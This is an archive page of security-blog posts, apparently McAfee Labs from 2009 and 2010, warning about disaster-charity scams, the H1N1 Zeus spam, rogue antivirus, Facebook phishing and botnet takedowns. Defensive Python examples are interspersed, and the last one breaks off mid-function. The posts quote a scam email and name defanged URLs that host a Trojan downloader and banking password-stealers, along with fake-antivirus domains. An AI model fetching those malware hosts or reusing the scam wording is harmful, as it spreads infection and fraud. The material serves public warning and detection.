Archive for the 'Spam and Phishing' Category

Scams Take Advantage of Haiti Relief Efforts

Never is the heartless nature of cybercriminals more apparent than in the wake of a tragedy. As relief efforts continue and worldwide aid pours in to help those affected by the earthquake that rocked Haiti on January 12, cybercriminals have not slowed their efforts. They are eager to get you to donate money that the people of Haiti will never see. Spoofing legitimate relief organizations such as the Red Cross is a typical social engineering lure used by the bad guys to take your money. This morning, however, a particular scam caught my eye that I wanted to share with you. Its subject line was “Help for Haiti” and was sent by “b.obama@whitehouse.gov.” Mr. “b.obama” writes:

President Barack Obama

On Tuesday, a catastrophic earthquake struck near Port-au-Prince, Haiti. The full extent of the damage is still being assessed, but the death toll — already in the thousands — is climbing fast.

This is the worst earthquake to hit the area in more than 200 years. Entire communities have been ripped apart and as many as 3 million people have been directly affected, including tens of thousands of American citizens who are in Haiti.

Our neighbors in Haiti are racing to confront the enormous devastation — and the OFA community can help.

Read down for more information about essential relief efforts and ways you can help today.

Footage is pouring in of homes collapsing, Haitians carrying injured family members, and hospitals being overrun in what was already the poorest nation in the Western Hemisphere.

I have directed my administration to respond with a swift, coordinated, and aggressive effort to save lives. Personnel from the United States and our partners in the international community are on the ground in damaged areas right now, working side by side with the Haitian people. They’re providing much-needed food, water, and sanitation supplies, saving lives and helping local communities start to rebuild.

Despite the fact that we are experiencing tough times here at home, I encourage those who can to reach out and help. It’s in times like these that we must show the kind of compassion and humanity that has defined the best of our national character for generations.

Read here to find out what you can do:

Obama In The United Kingdom

Help Haiti

Western Union Details

Name: XXXXXXXX

Country: United Kingdom

Call us On +XXXXXXXXXX
Any Funds given to the good people of America Here in The UK will be shared amongs Red Cross and all relief agencies.No amount is too small.

As this story continues to unfold, I hope you will continue to keep the people of Haiti in your thoughts and prayers, as well as the many Haitian-Americans who have done so much to enrich our country and who are worried about friends and loved ones in this time of need.

Thank you,

President Barack Obama

I’ve censored some of the contact information so that nobody visiting this blog will attempt to send money to the people responsible for this scam. I cannot emphasize enough that you must perform due diligence before donating to any charity. Ensure that the money you donate is going to the cause that you choose.

A couple of things to remember:

  • Don’t respond to emails requesting donations, credit card information, or other sensitive information that you do not feel comfortable giving
  • Don’t click links within email that direct to donation websites, as they may be directing you to a malicious website under the covers
  • Don’t open attachments with donation forms, as they may be executable malware
  • Work directly with charity organizations that you know and trust

Cybercriminals prey on the emotions of their victims. That’s why social engineering tactics such as these are successful. However, if you do your homework first, follow safe email and web-browsing habits, and work closely only with reputable charities to donate money, you can feel more comfortable that your sensitive information won’t end up in the wrong hands.
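The second bullet above warns that a donation link's visible text can point somewhere other than where the href actually goes. As an added example (not code from the original post), the Python below parses an HTML mail body, flags anchors whose visible domain differs from the href's domain, and flags public URL shorteners that hide the destination. The sample HTML, the shortener list and the `.test` hostnames are constructed for the demonstration.

```python
"""Inspect the links in an HTML email body: flag anchors whose visible text
names one domain while the href points somewhere else, and flag public URL
shorteners that hide the real destination. Added example; the HTML below is
a constructed message, not the scam mail quoted in the post."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "ow.ly", "is.gd"}  # common public shorteners
URL_LIKE = re.compile(r"(?:https?://)?[\w-]+(?:\.[\w-]+)+(?:/\S*)?", re.I)


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in the body."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Hostname of a URL; bare domains get a scheme so urlsplit parses them."""
    return urlsplit(url if "://" in url else "http://" + url).hostname or ""


def registrable_domain(host):
    """Approximation: last two labels (no public-suffix list, so co.uk-style hosts are over-split)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def inspect_links(html):
    """Return one finding per anchor with a list of flags (empty when nothing looks off)."""
    parser = AnchorCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.anchors:
        href_host = host_of(href)
        flags = []
        if href_host in SHORTENERS:
            flags.append("url-shortener")
        # Only compare when the visible text itself looks like a URL or domain.
        if URL_LIKE.fullmatch(text) and registrable_domain(host_of(text)) != registrable_domain(href_host):
            flags.append("text-href-mismatch")
        findings.append({"href": href, "text": text, "host": href_host, "flags": flags})
    return findings


# Constructed sample: one lookalike donation link, one shortener, one honest link.
SAMPLE_HTML = """
<p>Please give now: <a href="http://donate.haiti-relief-example.test/rc">www.redcross.org</a></p>
<p>Or <a href="http://bit.ly/2x9placeholder">click here to help</a>.</p>
<p>Official: <a href="https://www.redcross.org/donate">https://www.redcross.org/donate</a></p>
"""

if __name__ == "__main__":
    for finding in inspect_links(SAMPLE_HTML):
        print(finding["flags"] or ["ok"], finding["text"], "->", finding["href"])
```

The mismatch check only fires when the visible text itself looks like a domain or URL; plain "click here" text is left for the shortener and reputation checks, since there is no claimed destination to compare against.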

McAfee Labs’ January Spam Report

Angelina Jolie and Barack Obama are the #1 celeb subjects of choice for spammers, according to our January Spam Report. The report also reveals:

• The top 25 men and women that were spammed
• Chinese pharma spam isn’t going away – in fact, on Dec 14, spam levels skyrocketed with subject lines advertising discounts on Pfizer drugs
• “Free-hosting” websites, used to provide spam URLs, have become a major target for spammers

Be mindful of those celebrity names that appear in your inbox! Download the full report here.

2010 Predictions: the Year of a Major Social Networking Security Breach?

With the New Year just days away, it’s time for McAfee Labs 2010 Threat Predictions. What should you be wary of in the coming year? Social networks.

Sites such as Twitter and Facebook have changed the way we communicate, interact, and share on the web. As user bases for the top online social destinations reach record highs, cybercriminals are building out their criminal toolkits, taking advantage of new technologies, third-party applications, and hotspots of activity to exploit users.

What does this mean for the average surfer? Next time you receive an invite from one of your “Facebook friends” to play a game that looks like it’s shaping up to be the next Farmville, think twice before you click. In 2010, users are going to be more vulnerable to attacks that blindly distribute fake apps across their networks. The same goes for bit.ly’s and TinyURLs. As abbreviated URLs become more ubiquitous, it will be even easier for cybercriminals to mask and direct users to malicious sites.

Speaking of ubiquity: McAfee Labs predicts that Adobe will overtake Microsoft as the No. 1 target for cybercriminals in 2010. Adobe products—in particular Acrobat Reader and Flash—have become two of the most widely used apps in the world, and cybercriminals go where the masses go. Cybercriminals will have a field day preying on people using Adobe software.

McAfee also believes the following will play a critical role in 2010:

  • Banking Trojans will become even more sophisticated. They showed some firepower in 2009—easily getting around current protections used by banks—but next year they will reach a new level with the ability to interrupt legitimate transactions and make unauthorized withdrawals, while flying under the radar.
  • Malware via email attachments will increase, especially targeting corporations, journalists, and individuals
  • Botnets, the infrastructure that launches nearly every type of cyberattack, will adopt a peer-to-peer architecture, connecting computer to computer without a centralized control point—making it more difficult for cybersecurity professionals to detect them
  • HTML 5 and the evolution of the programming language will give cybercriminals new opportunities to write malware and prey on users

Countering these trends, in 2010 McAfee predicts a good year for law enforcement and the ability to identify, track, and combat cybercrime worldwide. After a decade of cybersecurity research, coordination, and training undertaken by agencies across the globe, the community will reap the benefits of the effort put forth over the past ten years.

McAfee Labs serves up the details on its threat predictions in the full report. Surf the web cautiously in 2010!

(We must correct one oversight: Our colleague Pedro Bueno was one of the authors of the report. His name was inadvertently left off the document. Thanks, Pedro!)

Check Your Friends! Facebook IMs May Lead To Trouble

I ran into a few strange IMs over the weekend. When I was not shoveling out my driveway from the 15 inches of snow that covered it, I was logged into Facebook telling people about it…. It was then that I started receiving some VERY interesting IMs from a friend extolling the virtues of a clean colon (yep – you read that right):

[Colon Cleanse IM]

This led to the following questionable site, which had some very interesting comments on our SiteAdvisor site:

[Colon Cleanse Website]

In short order I also received two more IMs. The first was a video (sound familiar???):

[Facebook Video IM]

This led to a pretty darn good fake Facebook login page (note the SiteAdvisor warning on that page!):

[FaceBook Phishing Page]

The address this page was hosted on also had a VERY malicious reputation rating from our TrustedSource technology:

[TrustedSource Rep Page]

Last but not least, I got one that included sales pricing for Christmas!!! It is the holidays, and scammers certainly like using seasonal trends:

[Christmas IM Scam]

This led to a really well done “replicas” site with brands such as Rolex, Tiffany, Breitling and others:

[Fake Watch Site]

I contacted my friend (who was certainly NOT sending the IMs knowingly) and got them fixed up pretty quickly. Not surprisingly, it was a Koobface variant on the local machine they were logging into Facebook from.

Facebook is one of the greatest and most popular sites on the Internet today. It has a huge user base, and as such is heavily targeted by scammers and malware writers. Make sure the computer you are accessing it from has up-to-date and properly configured security software!

McAfee Labs Releases December Spam Report

The United States is still a safe haven for spammers. With U.S. anti-spam legislation doing very little to thwart spammers and the McColo takedown having only a short-term effect, we have found that due to low-cost and reliable hosting and anonymous domain registration, our country remains the world’s top source for spam.

The December report also reveals:

  • “Twitter job” spam, which has been going on for months, is on the rise. It’s a scam that tries to get people to create Twitter accounts and send spam to their followers for money.
  • This season’s Christmas-themed malware is focused on the recession, advertising fake luxury goods and brands that are “on sale” through email
  • One year after the McColo ISP shutdown, spam has risen beyond the levels before McColo was taken offline
  • January 1, 2010, marks the sixth anniversary of the CAN-SPAM Act of 2003, but spam levels have reached record levels in the six years since the legislation passed

Read the report in its entirety here.

FIFA World Cup Ticket Scams Available Now

We recently alerted our readers to spam campaigns using the H1N1 vaccination program to prompt recipients to open the mail. And we have frequently mentioned that crooks love to take advantage of news, disasters, and other events.

Now that the final draw for the FIFA World Cup in South Africa next year has taken place, it is time to remind you that sports events are no exception to the rule. I’ve already found some examples.

The first is a fake lottery. In this case, the source claims the recipient has won a large sum of money from the South African Football Association. After contacting the lottery manager, the victim of the scam will be asked to pay “processing fees” or “transfer charges” so that the winnings can be distributed. Don’t expect to ever see a payment.

The second example is a “watch live games online” offer. Can you guess it’s a fake? The victims pay to download an HD video player, but they receive only a rogue security product (a.k.a. scareware).

When a sport makes the headlines, there are always fans who want to take part. We’ve also encountered fake club offers that are dedicated solely to collecting subscriptions.

As June 2010 approaches we’re certain these scam offers will increase in number and in professionalism. You must be especially vigilant if you plan to buy tickets online for the South Africa games. Go to fifa.com, use a reputable travel agent, or contact your football/soccer association directly. Don’t assume unsolicited online offers are genuine.

In September, The Times of London wrote that New Scotland Yard had tracked down and closed more than 100 sites so far, with as many as 20 based in Britain. These fraudsters were only the pioneers of an Internet crimewave that will rise as the World Cup approaches.

Here is a screenshot I took today on the official FIFA website. (Prices for the various categories are in US dollars.) The site explains that only one location–fifa.com–will sell tickets and that only a few other companies will sell authorized packages.

Compare the real thing with this suspicious site I also found today. It offers different prices for the same categories:

Don’t be disappointed before your team starts to play. Shop carefully if you plan to buy tickets!

Mapping the Mal Web: McAfee’s 3rd Annual Report

We have just released “Mapping the Mal Web,” our third report revealing the riskiest and safest web domains to surf and search.

For the first time combining data from McAfee’s SiteAdvisor and TrustedSource, the report is even more comprehensive than last year’s, naming Cameroon (.cm) as the riskiest place to surf with a whopping 36.7 percent of the domains posing a security risk.

For those domains for which we had 2,000 or more download tests, we measured the percentage of those tests that were risky. Romania (.ro, 21.0 percent), China (.cn, 18.6 percent), and the generic .info (15.2 percent) were found to be the most risky, leading the fourth-place finisher, .biz (6.8 percent), by a wide margin.

This report also shows how much registrars can achieve when they try. Last year Hong Kong (.hk) was the most risky domain to surf. After taking appropriate actions, their efforts paid off: with just 1.1 percent this year, they have dropped to 34th place. Congratulations to everyone involved!! ;)

That’s enough numbers for now. Get the full report here or find a summary over here.

The report is available in several other languages from the McAfee home page, and to help you avoid risky sites I strongly recommend our free SiteAdvisor.

H1N1 Vaccination Profile – A path to infection

On December 1st McAfee Labs detected an outbreak of spam mail pretending to be from the CDC and using the H1N1 virus to facilitate the distribution of a Zeus Trojan executable. The email claims that the CDC is requiring all people to fill out a “vaccination profile” online.

[H1N1 Vaccination Profile email claims to be from the CDC.]

This email has been associated with the following subjects, but there are likely to be more as the campaign progresses:

Governmental registration program on the H1N1 vaccination
State Vaccination H1N1 Program
Your personal Vaccination Profile
Create your personal Vaccination Profile
State Vaccination Program
Creation of personal Vaccination Profile
Instructions on creation of your personal Vaccination Profile
Creation of your personal Vaccination Profile

These emails contain a URL that points to a website which urges the victim to download a vaccination profile archive:

[This website wants to give you a virus.]

The link leads to an executable that installs a VERY recent Zeus Trojan variant. Zeus is an easy-to-use toolkit for constructing Trojans and has been associated with numerous botnets. As of the time of this writing, McAfee is among only a handful of AV engines that detect this strain (7 of 41 engines detected it according to VirusTotal, and McAfee accounted for 2 of those 7 engines).

The domains in the email were registered or updated a week before the campaign began. The whois information associated with the domains indicates that most of them were registered with a Belgian registrar, active24.be.

The DNS servers that are authoritative for the spam domains were purchased from the Chinese registrar “Xin Net Technologies”, but the DNS servers themselves are hosted at locations in the US, Japan and Hong Kong. We even see that some of the DNS servers in use were previously associated with sending spam mail for the Cutwail botnet, which has been known to use the Zeus Trojan. This could indicate that some of the DNS servers themselves may simply be infected hosts.

These hostnames are associated with 135 distinct IP addresses for the websites hosting the Trojan; the addresses come from all over the world and appear to be DSL accounts.

The primary countries hosting the websites at the time of this writing are Colombia, Brazil, India, Malaysia, Chile and Argentina.

Stay updated and stay safe!!
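The infrastructure clues in this post (domains registered or updated a week before the campaign, DNS servers shared across the spam domains, 135 hosting IPs that look like DSL lines) translate directly into a triage routine. The Python below is an added example, not McAfee's tooling: every WHOIS-style record, nameserver and reverse-DNS name is a constructed placeholder, the two-week age threshold is an assumption, and the IPs are RFC 5737 documentation addresses rather than anything from the real campaign.

```python
"""Triage the domains behind a spam campaign: which were registered just before
the campaign, which share nameservers, and how the hosting IPs are spread.
Added example; every record below is a constructed placeholder (whois-style
fields and reverse-DNS names), not the real H1N1 campaign infrastructure."""
from collections import defaultdict
from datetime import date

CAMPAIGN_START = date(2009, 12, 1)   # outbreak date given in the post
MAX_AGE_DAYS = 14                    # assumed threshold: created/updated within two weeks of the campaign

# Constructed WHOIS-style records (placeholder domains, registrars and nameservers).
RECORDS = [
    {"domain": "h1n1-profile-example1.test", "created": date(2009, 11, 24),
     "registrar": "registrar-a.example", "ns": ["ns1.pool-a.example", "ns2.pool-a.example"]},
    {"domain": "h1n1-profile-example2.test", "created": date(2009, 11, 24),
     "registrar": "registrar-a.example", "ns": ["ns1.pool-a.example", "ns3.pool-b.example"]},
    {"domain": "vaccination-example3.test", "created": date(2009, 11, 29),
     "registrar": "registrar-a.example", "ns": ["ns1.pool-a.example", "ns2.pool-a.example"]},
    {"domain": "long-established-example.test", "created": date(2005, 3, 14),
     "registrar": "registrar-b.example", "ns": ["ns1.long-established-example.test"]},
]

# Constructed resolution data: domain -> list of (ip, reverse-DNS name); RFC 5737 documentation addresses.
RESOLVED = {
    "h1n1-profile-example1.test": [("203.0.113.10", "10.113.0.203.dsl.isp-example.net"),
                                   ("198.51.100.7", "dyn-7.broadband-example.net")],
    "h1n1-profile-example2.test": [("203.0.113.10", "10.113.0.203.dsl.isp-example.net"),
                                   ("192.0.2.44", "host44.cable-example.org")],
    "vaccination-example3.test": [("192.0.2.91", "srv91.hosting-example.net")],
    "long-established-example.test": [("198.51.100.200", "www.long-established-example.test")],
}

RESIDENTIAL_HINTS = ("dsl", "dyn", "cable", "ppp", "pool")  # assumed substrings typical of consumer reverse DNS


def domain_age_days(record, as_of=CAMPAIGN_START):
    """Days between the record's creation/update date and the reference date."""
    return (as_of - record["created"]).days


def recently_registered(records, as_of=CAMPAIGN_START, max_age=MAX_AGE_DAYS):
    """Domains created (or last updated) within max_age days before the campaign start."""
    return sorted(r["domain"] for r in records if 0 <= domain_age_days(r, as_of) <= max_age)


def shared_nameservers(records):
    """Nameservers that serve more than one campaign domain: one operator, one DNS pool."""
    by_ns = defaultdict(set)
    for r in records:
        for ns in r["ns"]:
            by_ns[ns].add(r["domain"])
    return {ns: sorted(doms) for ns, doms in by_ns.items() if len(doms) > 1}


def hosting_summary(resolved):
    """Distinct hosting IPs and which of them look like consumer DSL/cable lines (likely infected hosts)."""
    rdns_by_ip = {}
    for entries in resolved.values():
        for ip, rdns in entries:
            rdns_by_ip[ip] = rdns.lower()
    residential = sorted(ip for ip, rdns in rdns_by_ip.items()
                         if any(hint in rdns for hint in RESIDENTIAL_HINTS))
    return {"distinct_ips": len(rdns_by_ip), "residential_ips": residential}


if __name__ == "__main__":
    print("registered shortly before the campaign:", recently_registered(RECORDS))
    print("shared nameservers:", shared_nameservers(RECORDS))
    print("hosting:", hosting_summary(RESOLVED))
```

Each of the three signals is weak on its own (new domains and shared nameservers are common for legitimate sites too); what makes the pattern worth blocking is the combination: fresh registrations, one DNS pool, and a fleet of consumer-line IPs behind the download sites.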

Get Rich Quick! Just In Time for the Holidays

National unemployment rates over 10% and the pressures of the holiday shopping season make for a dangerous cocktail that cyber criminals can take advantage of. Fears of not being able to pay the monthly mortgage, car payments, and backed-up bills, and of providing for your children for the holidays, have put many people into situations that they never thought they would find themselves in. This has caused many to become desperate and vulnerable as they try to make ends meet. Cyber criminals are always looking to take advantage of vulnerable situations as a way to dupe people into giving up their sensitive information. In addition to obviously being criminals, I always say that cyber criminals are also great marketers!

To that point, be on the lookout for many different types of scams this holiday season (check out our recently published “12 Scams of Christmas”), including get-rich-quick schemes and work-from-home opportunities that are really just covers for phishing scams or attempts to inject malware onto your computer.

We are monitoring a couple of such scams arriving via email which link off to Twitter updates or free blogging services like Google’s Blogspot:

[Get Rich!]

[More Getting Rich!!!]

[Get Rich Tweet!!]

As the holiday season progresses, we will see more of these types of scams popping up with themes ranging from holiday sales and rebate opportunities to holiday e-cards which actually install malicious applications instead of the holiday card! One bit of advice that we ask users to follow: if you are interested in the latest deals and bargains being offered by your favorite online retailer this holiday season, go to the web site directly by typing its address into your browser. Do not click on a link in an email or instant message to get you there, because the link might actually be masked to go to a lookalike site set up by cyber criminals to steal your personal information. If the offer that arrived in your inbox is legitimate, it will be honored on the web site when you browse there manually rather than clicking a link that arrived in your inbox.

Have a safe and malware-free holiday season!

Fly for $1 or Your Money Back!

It is the time of year to get together with family and friends, and that often involves flying. So, how about a promotional airline ticket for just $1?

That sounds like an irresistible idea! Though it also sounds too good to be true. As you can imagine, there is something wrong here. Instead of flying for a buck, you may end up with several hundred dollars fewer in your bank account.

This example is the most recent seasonal spam targeting Brazilians. In the image below you can see the pitch.

[Spam_Scam]

When you click on the image, which is hosted at hxxp://dhroot.hpg.com.br/images/danosse.jpg, you’ll follow a link that will attempt to download a Trojan from hxxp://www.medcitybuilders.com/plugins/system/[REMOVED]/. This Trojan is a downloader that will fetch password-stealing malware targeting the customers of Brazilian banks. That malware is currently hosted at hxxp://www.radfahrschule.at/html/modules/PagEd/browsepics/[REMOVED].

In Brazil we say “there is no such thing as free dinner.” In the States there’s no free lunch. In this case we can also see that there are no free air tickets. :)

The McColo Effect: One Year Later

One year ago today email administrators were astonished to notice the amount of spam hitting their mail servers had plunged precipitously. Email volumes dropped off as much as 60 percent to 70 percent, and the reason wasn’t immediately obvious to anyone except for the folks who knew that McColo, a major spam-hosting ISP had been taken offline. Three of the largest spam-sending botnets at the time–Rustock, Srizbi, and Mega-D–had command and control machines hosted at McColo and were drastically affected. Mega-D’s volume dropped by more than 95 percent and Srizbi volumes dropped by more than 80 percent.

[Srizbi DropOff]

[Mega-D DropOff]

However, only days after McColo was taken offline, it was reconnected for a brief period–about 12 hours–by its uplink provider, giving just enough time for the Rustock botnet owners to re-establish communication with their infected machines and point the command and control centers to other service providers. Rustock quickly regained its status as a top spam distributor. The Mega-D botnet owners also bounced back, until it was shut down just this past week. Srizbi, which once accounted for more than 50 percent of spam volume, never recovered and is no longer a factor in today’s spam wars.

What has happened since McColo was shut down? Did spam volumes ever recover from the loss of three of the largest spam-sending botnets? Not only did spam volumes recover, unfortunately, but they recovered quickly and have greatly surpassed the volumes that we saw before McColo was taken offline.

[ib Volume]

You can see in the preceding graph where volumes stood and how they dropped off after McColo was cut off. However, the shutdown’s effect was brief and ultimately small. We have seen dramatic increases since then due to the relaunching of botnets such as Rustock as well as new botnets such as Bredo (which primarily sends fake nondelivery notifications spoofing package delivery services like FedEx, DHL, and UPS) and Waledac (the rebirth of the Storm botnet). Spam volumes have more than doubled since just February 2009, dwarfing several times over the decreases due to McColo’s demise.

The McColo closure as a single event remains significant, but when you compare it with the huge increases in volumes that we have seen since then–because of increased spoofs against social media sites through viruses like Koobface, and because spam continues to be a major factor in the successes of Rustock and Cutwail–the decrease now reflects only a momentary blip on the radar.

Nonetheless, you should expect to see more of these types of takedowns as security researchers and research organizations continue to get involved, but you should also expect the overall effect of those shutdowns to be temporary. McColo has taught botnet owners a lesson. As a result botnet control centers have become more distributed, spanning many networks in many countries. Today taking down a big hosting provider would prove only a minor inconvenience as opposed to a major victory for security forces.
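To put numbers like the 60 to 70 percent plunge on a repeatable footing, the added example below (not McAfee's analysis code) compares each day's volume with the median of the preceding seven days and reports drops and surges beyond a threshold. The daily counts are constructed to follow the post's narrative, a steady baseline, a takedown-style plunge, a slow recovery and then growth past the old level, and are not McAfee's measurements.

```python
"""Detect abrupt drops and surges in daily spam volume against a trailing
baseline, the kind of shift the McColo takedown produced. Added example; the
daily counts are constructed to mimic the post's narrative, not McAfee's data."""
from statistics import median


def percent_change(current, baseline):
    """Percentage difference of current from baseline (0 when baseline is 0)."""
    return (current - baseline) / baseline * 100.0 if baseline else 0.0


def detect_shifts(series, window=7, drop_pct=-50.0, surge_pct=100.0):
    """series: list of (day_label, count). Each day is compared with the median of the
    preceding `window` days; the median resists distortion by a single outlier day.
    Returns (label, 'drop'|'surge', percent_change) for days beyond the thresholds."""
    events = []
    for i in range(window, len(series)):
        label, count = series[i]
        baseline = median(c for _, c in series[i - window:i])
        change = round(percent_change(count, baseline), 1)
        if change <= drop_pct:
            events.append((label, "drop", change))
        elif change >= surge_pct:
            events.append((label, "surge", change))
    return events


# Constructed daily counts (thousands of messages): steady, a takedown-style plunge,
# a slow recovery, then growth well past the old level.
SAMPLE_SERIES = [(f"day{i + 1}", c) for i, c in enumerate(
    [100, 102, 98, 101, 99, 100, 103, 100, 101, 99,   # days 1-10: baseline
     30, 35, 40, 45, 50, 55, 60, 65,                  # days 11-18: plunge and recovery
     150, 220])]                                      # days 19-20: new botnets push volume past the old level


def summarize(series, **kwargs):
    """Events plus the deepest drop and largest surge, for a one-line report."""
    events = detect_shifts(series, **kwargs)
    drops = [e[2] for e in events if e[1] == "drop"]
    surges = [e[2] for e in events if e[1] == "surge"]
    return {"events": events,
            "deepest_drop": min(drops, default=None),
            "largest_surge": max(surges, default=None)}


if __name__ == "__main__":
    for label, kind, change in detect_shifts(SAMPLE_SERIES):
        print(f"{label}: {kind} of {change:+.1f}% against the trailing 7-day median")
    print(summarize(SAMPLE_SERIES))
```

Because the baseline is a trailing median, the plunge keeps registering as a drop for several days after the event while the window still holds mostly pre-takedown values; once the window has rolled over to the depressed level, the later surge is measured against that new low, which is exactly the "recovered and surpassed" picture the post describes.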

Rogue Security Product Copies McAfee’s Look and Feel

How good are you at identifying a genuine security product from an imposter that claims to offer protection? If you think you are good at it, then have a look at the images below.

[Legitimate McAfee site]

[Rogue Anti-Virus MaCatte site]

Recently we have seen the rapid growth of rogue anti-virus/spyware programs. This one is especially interesting. Why? Because it mimics McAfee’s security product. This rogue software displays the same user interface as McAfee Security Center. It also offers a web page that looks similar to McAfee’s legitimate site.

I suppose we should be flattered that malware authors have chosen our product as one worth imitating. Rogue anti-virus products have long mimicked Microsoft’s security apps in Windows XP (FakeAlert-XPSecCenter) and Windows Vista/Windows 7 (FakeAlert-EA).

The idea behind fake AV software is to trick unsuspecting users into thinking their machines are infected. The malware will display a window that shows many innocent files detected arbitrarily as compromised. These fake security alerts are baseless–they exist to trick victims into pressing the panic button. In this case agreeing to “Remove all threats now” will lead to purchasing the MaCatte Antivirus 2009 product. The rogue software offers several “features”:

  • It displays fake warning messages and “Safety Center Alert” pop-ups
  • It flashes icons that appear in the system tray
  • It hijacks the browser’s homepage to a site that mimics McAfee’s site (as shown in the second image)

[MaCatte SecurityCenter image]

And that’s not all–MaCatte Antivirus 2009 will block currently installed or downloaded anti-virus software. It will redirect your browser to various misleading websites, including the rogue program’s homepage, www.macatte.com.

Once installed, MaCatte Antivirus will start automatically when you boot Windows. Then it will scan your computer and display numerous infections, but will not remove them until you first purchase the program.

The cost of cleaning the “malicious” files comes at the rip-off price of $99. Leading legitimate anti-virus security products don’t come close to the cost of this imposter. I hope that’s an eye opener for you. Don’t become a victim.

Update: McAfee’s legal team contacted the domain registrars, who swiftly brought down the site to spare unsuspecting surfers from becoming victims to this imposter. Detection is available beginning with the 5793 DATs as FakeAlert-MaCatte.

Pacquiao vs. Cotto

Warning to all Pacquiao and Cotto fans: bad guys are taking advantage of their upcoming fight. Searching for “Pacquiao vs Cotto” could lead to fake anti-virus programs.

This is similar to the scam described in Arun Pradeep’s blog post. Once the search result is clicked, users are redirected to a website that shows a fake online malware scan and warns users that their systems are infected. It then asks them to install an anti-virus program to remove the malware.

This fake online scanning is seen hosted at the following domains:

  • secure-pcprotection.net
  • examinedicho.com

This malware is now detected as FakeAlert-AB. Always update your security product and be extra careful when accessing unknown sites.

Tis the Season for Christmas Spam! Fa La La La La…

It didn’t take long for spammers to move on from Halloween lures for their spam and malware. They’ve already moved to the Christmas season, and we have started to see emails from the Cutwail botnet that use a Christmas theme to trick users into visiting malicious websites. Spammers must be trying to beat retailers to the advertising punch this year.

[Christmas spam]

The campaign we are currently monitoring uses subject lines that try to get users to visit websites selling fake jewelry and Rolexes. These spammers aren’t cheap either. Only the best will do for their customers–brands such as Cartier, Gucci, and Tag Heuer are on “sale” to all who would be fooled.

[Rolex ad]

They even went so far as to include a Better Business Bureau logo and a “Hacker Safe” image on their site. Ironic, isn’t it?

This and similar sites are part of a campaign to steal your credit card information and identity. With the holiday shopping season rushing toward us, be sure to exercise extreme diligence regarding the businesses you give your sensitive information to. The tricks that criminals use during the holiday season will be difficult to discern from legitimate marketing.

How can you stay safe? Avoid clicking links in emails. If you want to visit your favorite retail site to check out its holiday specials, type the address directly into the address bar. Most legitimate sites will not force you to click a link within an email to take advantage of their latest deals.

Facebook Phishing Campaign Pushes ‘Cocktail’ Attack

We have already discussed the Facebook phishing campaign. Now the scammers are using the phishing campaign not just for spamming but also for a “cocktail” attack.

  • The scammers target Facebook users, telling them that their Facebook account passwords have been changed.
  • The malware downloads a keylogger to collect credit card numbers, social security numbers, and other passwords from the victims’ machines.
  • The malware pushes a fake security product, which disables many applications, such as Notepad, Wordpad, etc., until the bad guys are paid.

This phishing campaign attempts to convince users that the email comes from Facebook by forging the From: address.

[Phishing mail]

The mail claims the password has been changed and that it is available in the attached zip file. Once the victims unzip it, they see a file with a spreadsheet icon. When the victim tries to open the file to look for a password, it drops the payload and deletes itself. Once the malware is installed, it establishes a connection to the attacker’s server over the HTTP port and attempts to download more payloads onto the infected machine.

The malware also downloads a keylogger and runs it covertly. This second stage captures every keystroke so that it can collect information such as login IDs and passwords, credit card and social security numbers, etc. The malware sends the data to a remote server through a backdoor it creates. But this is not yet the end of the game.

While this data theft occurs, the malware also tries to download a fake security product. The rogue application that enters through the backdoor is covertly installed on the victim’s machine. Once installed, the fake product runs a service that kills almost all open applications: Notepad, Calculator, Registry Editor, Task Manager, and others. (It does not kill Internet Explorer because it needs IE to communicate with the malware server.) After killing these apps, the malware shows a fake alert, claiming the application you’re trying to open is being used to connect to a malware server. (See image below.)

[Fake Alert]

[Fake Security Product]

Phishing campaigns on social networking sites are not new. Scammers are not satisfied only pushing spam to sell “Canadian” pills. Now they also want to sell fake security products, and they need all of our passwords. With McAfee coverage, you’ll be protected against this cocktail attack.
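The two elements that make this mail work, a forged From: address and an executable hiding in a zip behind a spreadsheet icon, are both checkable at the mail gateway. The Python below is an added example, not McAfee's detection logic: it builds a constructed lookalike message in memory (placeholder envelope sender, a zip whose executable member is only a 64-byte stub carrying the PE "MZ" signature) and then triages it, comparing the From: domain with the Return-Path domain and inspecting each zip member by extension and magic bytes.

```python
"""Triage a message like the one described above: check whether the From:
domain matches the envelope sender recorded in Return-Path, and look inside
a zip attachment for members that are really Windows executables. Added
example; the message and zip are constructed in memory (the 'executable' is a
64-byte stub that only carries the PE 'MZ' signature), not the campaign's
actual sample."""
import io
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from email.utils import parseaddr

EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs"}


def build_sample_message():
    """Constructed lookalike of the phishing mail: Facebook in From:, a different envelope
    sender, and a zip whose member is an executable. (The spreadsheet icon the post mentions
    would be a PE resource, invisible here; the 'MZ' header is what a scanner keys on.)"""
    stub = b"MZ" + b"\x00" * 62  # PE signature only; not a runnable program
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Facebook_Password.exe", stub)
        z.writestr("readme.txt", b"constructed harmless member")
    msg = EmailMessage()
    msg["From"] = "Facebook <service@facebook.com>"    # forged to look like Facebook
    msg["Return-Path"] = "<bounce@mailer.example>"      # placeholder envelope sender, as an MTA records it
    msg["Subject"] = "Facebook password reset"
    msg.set_content("Your password has been changed. The new password is in the attached file.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename="Facebook_Password.zip")
    return msg.as_bytes()


def sender_check(msg):
    """Compare the domain users see (From:) with the domain in Return-Path."""
    _, from_addr = parseaddr(str(msg["From"] or ""))
    _, return_path = parseaddr(str(msg.get("Return-Path", "")))
    from_dom = from_addr.rpartition("@")[2].lower()
    rp_dom = return_path.rpartition("@")[2].lower()
    return from_dom, rp_dom, bool(rp_dom) and from_dom != rp_dom


def inspect_zip_members(data):
    """Flag executable extensions, double extensions and PE magic regardless of name."""
    findings = []
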